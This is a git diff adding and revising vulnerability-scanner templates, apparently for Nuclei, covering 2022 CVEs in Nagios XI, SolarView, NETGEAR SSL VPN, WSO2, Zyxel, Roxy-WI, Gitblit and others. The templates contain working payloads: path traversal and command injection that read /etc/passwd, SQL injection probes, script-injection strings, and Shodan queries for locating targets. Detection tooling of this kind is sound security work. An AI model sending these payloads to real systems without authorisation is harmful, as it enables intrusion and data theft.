diff --git a/cves/2022/CVE-2022-29272.yaml b/cves/2022/CVE-2022-29272.yaml
new file mode 100644
index 0000000000..0174a28b3a
--- /dev/null
+++ b/cves/2022/CVE-2022-29272.yaml
@@ -0,0 +1,50 @@
+id: CVE-2022-29272
+
+info:
+  name: Nagios XI < 5.8.5 - Open Redirect
+  author: ritikchaddha
+  severity: medium
+  description: |
+    In Nagios XI through 5.8.5, an open redirect vulnerability exists in the login function that could lead to spoofing.
+  reference:
+    - https://github.com/sT0wn-nl/CVEs/tree/master/CVE-2022-29272
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29272
+    - https://github.com/4LPH4-NL/CVEs
+    - https://github.com/sT0wn-nl/CVEs/blob/master/README.md#nagios-xi
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-29272
+    cwe-id: CWE-601
+  tags: cve,cve2022,redirect,nagios,nagiosxi
+
+requests:
+  - raw:
+      - |
+        GET /nagiosxi/login.php?redirect=/www.interact.sh HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /nagiosxi/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        nsp={{nsp_token}}&page=auth&debug=&pageopt=login&redirect=%2Fwww.interact.sh&username={{username}}&password={{password}}&loginButton=Login
+
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: regex
+        part: header
+        regex:
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
+
+    extractors:
+      - type: regex
+        part: body
+        name: nsp_token
+        group: 1
+        internal: true
+        regex:
+          - '<input type="hidden" name="nsp" value="(.*)">'
+          - "<input type='hidden' name='nsp' value='(.*)'>"
diff --git a/cves/2022/CVE-2022-29298.yaml b/cves/2022/CVE-2022-29298.yaml
new file mode 100644
index 0000000000..2f75e09114
--- /dev/null
+++ b/cves/2022/CVE-2022-29298.yaml
@@ -0,0 +1,39 @@
+id: CVE-2022-29298
+
+info:
+  name: SolarView Compact 6.00 - Local File Inclusion
+  author: ritikchaddha
+  severity: high
+  description: SolarView Compact 6.00 is vulnerable to local file inclusion which could allow attackers to access sensitive files.
+  reference:
+    - https://www.exploit-db.com/exploits/50950
+    - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view
+    - https://drive.google.com/file/d/1-RHw9ekVidP8zc0xpbzBXnse2gSY1xbH/view?usp=sharing
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29298
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-29298
+    cwe-id: CWE-22
+  metadata:
+    shodan-query: http.html:"SolarView Compact"
+    verified: "true"
+  tags: lfi,solarview,edb,cve,cve2022
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg"
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2022/CVE-2022-29299.yaml b/cves/2022/CVE-2022-29299.yaml
new file mode 100644
index 0000000000..cacf113fb8
--- /dev/null
+++ b/cves/2022/CVE-2022-29299.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-29299
+
+info:
+  name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting
+  author: For3stCo1d
+  severity: medium
+  description: |
+    SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.
+  reference:
+    - https://www.exploit-db.com/exploits/50967
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299
+  classification:
+    cve-id: CVE-2022-29299
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-244067125
+  tags: cve,cve2022,xss,solarview,edb
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script><"">'
+          - '/Solar_History.php" METHOD="post">'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by cs 06/21/2022
diff --git a/cves/2022/CVE-2022-29301.yaml b/cves/2022/CVE-2022-29301.yaml
new file mode 100644
index 0000000000..d313b33940
--- /dev/null
+++ b/cves/2022/CVE-2022-29301.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-29301
+
+info:
+  name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting
+  author: For3stCo1d
+  severity: high
+  description: |
+    SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php.
+  reference:
+    - https://www.exploit-db.com/exploits/50968
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301
+  classification:
+    cve-id: CVE-2022-29301
+  metadata:
+    verified: true
+    shodan-query: http.favicon.hash:-244067125
+  tags: cve,cve2022,xss,solarview,edb
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '<script>alert(document.domain)</script><"">'
+          - 'SolarView'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by cs 06/21/2022
diff --git a/cves/2022/CVE-2022-29303.yaml b/cves/2022/CVE-2022-29303.yaml
new file mode 100644
index 0000000000..1d2c392e54
--- /dev/null
+++ b/cves/2022/CVE-2022-29303.yaml
@@ -0,0 +1,42 @@
+id: CVE-2022-29303
+
+info:
+  name: SolarView Compact 6.00 - OS Command Injection
+  author: badboycxcc
+  severity: critical
+  description: |
+    SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.
+  reference:
+    - https://www.exploit-db.com/exploits/50940
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303
+    - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-29303
+    cwe-id: CWE-77
+  metadata:
+    shodan-query: http.html:"SolarView Compact"
+    verified: "true"
+  tags: cve,cve2022,rce,injection,solarview,edb
+
+variables:
+  cmd: "cat${IFS}/etc/passwd"
+
+requests:
+  - raw:
+      - |
+        @timeout: 25s
+        POST /conf_mail.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M
+
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0"
+
+# Enhanced by mp on 2022/06/01
diff --git a/cves/2022/CVE-2022-29349.yaml b/cves/2022/CVE-2022-29349.yaml
new file mode 100644
index 0000000000..0afba26701
--- /dev/null
+++ b/cves/2022/CVE-2022-29349.yaml
@@ -0,0 +1,40 @@
+id: CVE-2022-29349
+
+info:
+  name: kkFileView v4.0.0 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    kkFileView v4.0.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.
+  reference:
+    - https://github.com/kekingcn/kkFileView/issues/347
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29349
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-29349
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"kkFileView"
+    verified: "true"
+  tags: cve,cve2022,kkFileView,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - 'txt"><img src=111 onerror=alert(1)>123'
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-29383.yaml b/cves/2022/CVE-2022-29383.yaml
new file mode 100644
index 0000000000..c0522654b9
--- /dev/null
+++ b/cves/2022/CVE-2022-29383.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-29383
+
+info:
+  name: NETGEAR ProSafe SSL VPN firmware - SQL Injection
+  author: elitebaz
+  severity: critical
+  description: |
+    NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.
+  reference:
+    - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383
+    - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29383
+    - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-29383
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,sqli,netgear,router
+
+requests:
+  - raw:
+      - |
+        POST /scgi-bin/platform.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=utf-8
+
+        thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
+
+      - |
+        POST /scgi-bin/platform.cgi HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=utf-8
+
+        thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd
+
+    req-condition: true
+    matchers:
+      - type: dsl
+        dsl:
+          - contains(body_1, "User authentication Failed")
+          - contains(body_2, "User Login Failed for SSLVPN User.")
+        condition: and
+
+# Enhanced by mp on 2022/07/04
diff --git a/cves/2022/CVE-2022-29455.yaml b/cves/2022/CVE-2022-29455.yaml
new file mode 100644
index 0000000000..5352bde094
--- /dev/null
+++ b/cves/2022/CVE-2022-29455.yaml
@@ -0,0 +1,54 @@
+id: CVE-2022-29455
+
+info:
+  name: Wordpress Elementor <= 3.5.5 - DOM-based Cross-Site Scripting
+  author: rotembar,daffainfo
+  severity: medium
+  description: |
+    DOM-based Reflected Cross-Site Scripting (XSS) vulnerability in Elementor's Elementor Website Builder plugin <= 3.5.5 versions.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29455
+    - https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor
+    - https://www.rotem-bar.com/elementor
+    - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-5-5-unauthenticated-dom-based-reflected-cross-site-scripting-xss-vulnerability
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-29455
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,xss,wordpress,elementor
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/wp-content/plugins/elementor/readme.txt'
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - 'Elementor Website Builder'
+
+      - type: dsl
+        dsl:
+          - compare_versions(version, '<= 3.5.5')
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+      - type: regex
+        name: version
+        internal: true
+        group: 1
+        regex:
+          - "(?m)Stable tag: ([0-9.]+)"
+
+      - type: regex
+        group: 1
+        regex:
+          - "(?m)Stable tag: ([0-9.]+)"
diff --git a/cves/2022/CVE-2022-29464.yaml b/cves/2022/CVE-2022-29464.yaml
index 7760953a04..c82331a780 100644
--- a/cves/2022/CVE-2022-29464.yaml
+++ b/cves/2022/CVE-2022-29464.yaml
@@ -1,21 +1,24 @@
 id: CVE-2022-29464
 
 info:
-  name: WSO2 Management - Unrestricted Arbitrary File Upload & Remote Code Execution
+  name: WSO2 Management - Arbitrary File Upload & Remote Code Execution
   author: luci,dhiyaneshDk
   severity: critical
-  description: Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through
-    5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.
+  description: |
+    Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.
   reference:
     - https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/
     - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738
-    - https://nvd.nist.gov/vuln/detail/CVE-2022-29464
     - https://github.com/hakivvi/CVE-2022-29464
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-29464
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2022-29464
+    cwe-id: CWE-434
   metadata:
     shodan-query: http.favicon.hash:1398055326
-  tags: cve,cve2022,rce,fileupload,wso2,intrusive
+  tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev
 
 requests:
   - raw:
@@ -40,4 +43,6 @@ requests:
     matchers:
       - type: dsl
         dsl:
-          - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')"
\ No newline at end of file
+          - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')"
+
+# Enhanced by mp on 2022/05/19
diff --git a/cves/2022/CVE-2022-29548.yaml b/cves/2022/CVE-2022-29548.yaml
index 22a912ae8a..d77f5b79ce 100644
--- a/cves/2022/CVE-2022-29548.yaml
+++ b/cves/2022/CVE-2022-29548.yaml
@@ -1,7 +1,7 @@
 id: CVE-2022-29548
 
 info:
-  name: WSO2 Management Console - Reflected XSS
+  name: WSO2 Management Console - Cross-Site Scripting
   author: edoardottt
   severity: medium
   description: |
@@ -9,14 +9,15 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2022-29548
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29548
+    - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2022-29548
     cwe-id: CWE-79
   metadata:
-    verified: true
-    google-dork: inurl:"carbon/admin/login"
+    google-query: inurl:"carbon/admin/login"
+    verified: "true"
   tags: cve,cve2022,wso2,xss
 
 requests:
diff --git a/cves/2022/CVE-2022-30073.yaml b/cves/2022/CVE-2022-30073.yaml
new file mode 100644
index 0000000000..9b6d4abc54
--- /dev/null
+++ b/cves/2022/CVE-2022-30073.yaml
@@ -0,0 +1,72 @@
+id: CVE-2022-30073
+
+info:
+  name: WBCE CMS v1.5.2 XSS Stored
+  author: arafatansari
+  severity: medium
+  description: |
+    WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\user\save.php Display Name parameters.
+  reference:
+    - https://github.com/APTX-4879/CVE
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073
+    - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2022-30073
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2022,wbcecms,xss
+
+requests:
+  - raw:
+      - |
+        POST /admin/login/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
+
+      - |
+        GET /admin/users/index.php HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        POST /admin/users/index.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
+
+      - |
+        GET /admin/users/index.php HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: regex
+        name: formtoken
+        part: body
+        group: 1
+        regex:
+          - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
+        internal: true
+
+    cookie-reuse: true
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<p><b><script>alert(document.cookie)</script>"
+          - "WBCECMS"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-30489.yaml b/cves/2022/CVE-2022-30489.yaml
index 23aaf83d2f..4c5426d828 100644
--- a/cves/2022/CVE-2022-30489.yaml
+++ b/cves/2022/CVE-2022-30489.yaml
@@ -1,17 +1,24 @@
 id: CVE-2022-30489
 
 info:
-  name: Wavlink Wn535g3 - POST XSS
+  name: Wavlink Wn535g3 - POST Cross-Site Scripting
   author: For3stCo1d
-  severity: high
+  severity: medium
+  description: |
+    WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi.
   reference:
     - https://github.com/badboycxcc/XSS-CVE-2022-30489
     - https://nvd.nist.gov/vuln/detail/CVE-2022-30489
+    - https://github.com/badboycxcc/XSS
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-30489
+    cwe-id: CWE-79
   metadata:
-    verified: true
     shodan-query: http.title:"Wi-Fi APP Login"
+    verified: "true"
   tags: xss,cve2022,wavlink,cve,router,iot
-  description: "WAVLINK WN535 G3 was discovered to contain a cross-site scripting (XSS) vulnerability via the hostname parameter at /cgi-bin/login.cgi."
 
 requests:
   - raw:
diff --git a/cves/2022/CVE-2022-30525.yaml b/cves/2022/CVE-2022-30525.yaml
index d16b0266ff..12922c9a7a 100644
--- a/cves/2022/CVE-2022-30525.yaml
+++ b/cves/2022/CVE-2022-30525.yaml
@@ -1,18 +1,24 @@
 id: CVE-2022-30525
 
 info:
-  name: Zyxel Firewall - Unauthenticated RCE
+  name: Zyxel Firewall - OS Command Injection
   author: h1ei1,prajiteshsingh
   severity: critical
   description: |
-    The vulnerability affects Zyxel firewalls that support Zero Touch Provisioning (ZTP), including the ATP Series, VPN Series, and USG FLEX Series (including USG20-VPN and USG20W-VPN), allowing an unauthenticated remote attacker to target the affected device as nobody Execute arbitrary code as a user on.
+    An OS command injection vulnerability in the CGI program of Zyxel USG FLEX 100(W) firmware versions 5.00 through 5.21 Patch 1, USG FLEX 200 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 500 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 700 firmware versions 5.00 through 5.21 Patch 1, USG FLEX 50(W) firmware versions 5.10 through 5.21 Patch 1, USG20(W)-VPN firmware versions 5.10 through 5.21 Patch 1, ATP series firmware versions 5.10 through 5.21 Patch 1, VPN series firmware versions 4.60 through 5.21 Patch 1, are susceptible to a command injection vulnerability which could allow an attacker to modify specific files and then execute some OS commands on a vulnerable device.
   reference:
     - https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/
     - https://github.com/rapid7/metasploit-framework/pull/16563
+    - https://www.zyxel.com/support/Zyxel-security-advisory-for-OS-command-injection-vulnerability-of-firewalls.shtml
     - https://nvd.nist.gov/vuln/detail/CVE-2022-30525
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-30525
+    cwe-id: CWE-78
   metadata:
     shodan-query: title:"USG FLEX 100","USG FLEX 100w","USG FLEX 200","USG FLEX 500","USG FLEX 700","USG FLEX 50","USG FLEX 50w","ATP100","ATP200","ATP500","ATP700"
-  tags: rce,zyxel,cve,cve2022,firewall,unauth
+  tags: zyxel,cve,cve2022,firewall,unauth,kev,msf,rce
 
 requests:
   - raw:
@@ -33,3 +39,5 @@ requests:
       - type: status
         status:
           - 500
+
+# Enhanced by mp on 2022/05/19
diff --git a/cves/2022/CVE-2022-30776.yaml b/cves/2022/CVE-2022-30776.yaml
new file mode 100644
index 0000000000..10403b474a
--- /dev/null
+++ b/cves/2022/CVE-2022-30776.yaml
@@ -0,0 +1,43 @@
+id: CVE-2022-30776
+
+info:
+  name: Atmail - Cross-Site Scripting
+  author: 3th1c_yuk1
+  severity: medium
+  description: |
+    atmail 6.5.0 allows XSS via the index.php/admin/index/ error parameter.
+  reference:
+    - https://medium.com/@bhattronit96/cve-2022-30776-cd34f977c2b9
+    - https://www.atmail.com/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-30776
+    - https://help.atmail.com/hc/en-us/sections/115003283988
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-30776
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: http.html:"atmail"
+    verified: "true"
+  tags: cve,cve2022,atmail,xss
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/atmail/index.php/admin/index/?error=1%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "Error: 1<script>alert(document.domain)</script>"
+
+      - type: word
+        part: header
+        words:
+          - text/html
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-30777.yaml b/cves/2022/CVE-2022-30777.yaml
new file mode 100644
index 0000000000..f1a225dbee
--- /dev/null
+++ b/cves/2022/CVE-2022-30777.yaml
@@ -0,0 +1,44 @@
+id: CVE-2022-30777
+
+info:
+  name: Parallels H-Sphere - Cross-Site Scripting
+  author: 3th1c_yuk1
+  severity: medium
+  description: |
+    Parallels H-Sphere 3.6.1713 allows XSS via the index_en.php from parameter.
+  reference:
+    - https://medium.com/@bhattronit96/cve-2022-30777-45725763ab59
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-30777
+    - https://en.wikipedia.org/wiki/H-Sphere
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 6.1
+    cve-id: CVE-2022-30777
+    cwe-id: CWE-79
+  metadata:
+    shodan-query: title:"h-sphere"
+    verified: "true"
+  tags: cve,cve2022,parallels,hsphere,xss
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/index_en.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+      - '{{BaseURL}}/index.php?from=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
+
+    stop-at-first-match: true
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        words:
+          - '<TITLE>"><script>alert(document.domain)</script>'
+
+      - type: word
+        part: header
+        words:
+          - "text/html"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-31126.yaml b/cves/2022/CVE-2022-31126.yaml
new file mode 100644
index 0000000000..8c84249b26
--- /dev/null
+++ b/cves/2022/CVE-2022-31126.yaml
@@ -0,0 +1,46 @@
+id: CVE-2022-31126
+
+info:
+  name: Roxy-WI - Unauthenticated Remote Code Execution
+  author: DhiyaneshDK
+  severity: critical
+  description: |
+    Roxy-WI versions before 6.1.1.0 are vulnerable to a remote code execution vulnerability. System commands can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Attackers need not be authenticated to exploit this vulnerability.
+  reference:
+    - http://packetstormsecurity.com/files/167805/Roxy-WI-Remote-Command-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31137
+    - https://www.cve.org/CVERecord?id=CVE-2022-31137
+    - https://github.com/hap-wi/roxy-wi/security/advisories/GHSA-mh86-878h-43c9
+  remediation: Users are advised to upgrade to latest version.
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2022-31126
+    cwe-id: CWE-74
+  metadata:
+    shodan-query: http.html:"Roxy-WI"
+    verified: "true"
+  tags: cve,cve2022,rce,unauth,roxy,packetstorm
+
+requests:
+  - raw:
+      - |
+        POST /app/options.py HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
+        X-Requested-With: XMLHttpRequest
+        Origin: {{BaseURL}}
+        Referer: {{BaseURL}}/app/login.py
+
+        alert_consumer=1&serv=127.0.0.1&ipbackend=";cat+/etc/passwd+##&backend_server=127.0.0.1
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2022/CVE-2022-31268.yaml b/cves/2022/CVE-2022-31268.yaml
new file mode 100644
index 0000000000..b8148bb605
--- /dev/null
+++ b/cves/2022/CVE-2022-31268.yaml
@@ -0,0 +1,48 @@
+id: CVE-2022-31268
+
+info:
+  name: Gitblit 1.9.3 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: |
+    Gitblit 1.9.3 is vulnerable to local file inclusion via /resources//../ (e.g., followed by a WEB-INF or META-INF pathname).
+  reference:
+    - https://github.com/metaStor/Vuls/blob/main/gitblit/gitblit%20V1.9.3%20path%20traversal/gitblit%20V1.9.3%20path%20traversal.md
+    - https://vuldb.com/?id.200500
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31268
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2022-31268
+    cwe-id: CWE-22
+  metadata:
+    shodan-query: http.html:"Gitblit"
+    verified: "true"
+  tags: cve,cve2022,lfi,gitblit
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/resources//../WEB-INF/web.xml"
+
+    matchers-condition: and
+    matchers:
+
+      - type: word
+        part: body
+        words:
+          - "</web-app>"
+          - "java.sun.com"
+          - "gitblit.properties"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2022/CVE-2022-31269.yaml b/cves/2022/CVE-2022-31269.yaml
new file mode 100644
index 0000000000..625a774083
--- /dev/null
+++ b/cves/2022/CVE-2022-31269.yaml
@@ -0,0 +1,49 @@
+id: CVE-2022-31269
+
+info:
+  name: eMerge E3-Series - Information Disclosure
+  author: For3stCo1d
+  severity: high
+  description: |
+    Admin credentials are stored in clear text at the endpoint /test.txt (This occurs in situations where the default credentials admin:admin have beenchanged.) Allows an unauthenticated attacker to obtain adminicredentials, access the admin dashboard of Linear eMerge E3-Series devices, control entire building doors, cameras, elevator, etc... and access information about employees who can access the building and take control of the entire building.
+  reference:
+    - https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html
+    - https://www.nortekcontrol.com/access-control/
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-31269
+    - https://eg.linkedin.com/in/omar-1-hashem
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
+    cvss-score: 8.2
+    cve-id: CVE-2022-31269
+    cwe-id: CWE-798
+  metadata:
+    shodan-query: http.title:"Linear eMerge"
+    verified: "true"
+  tags: cve2022,emerge,exposure,packetstorm,cve
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/test.txt"
+
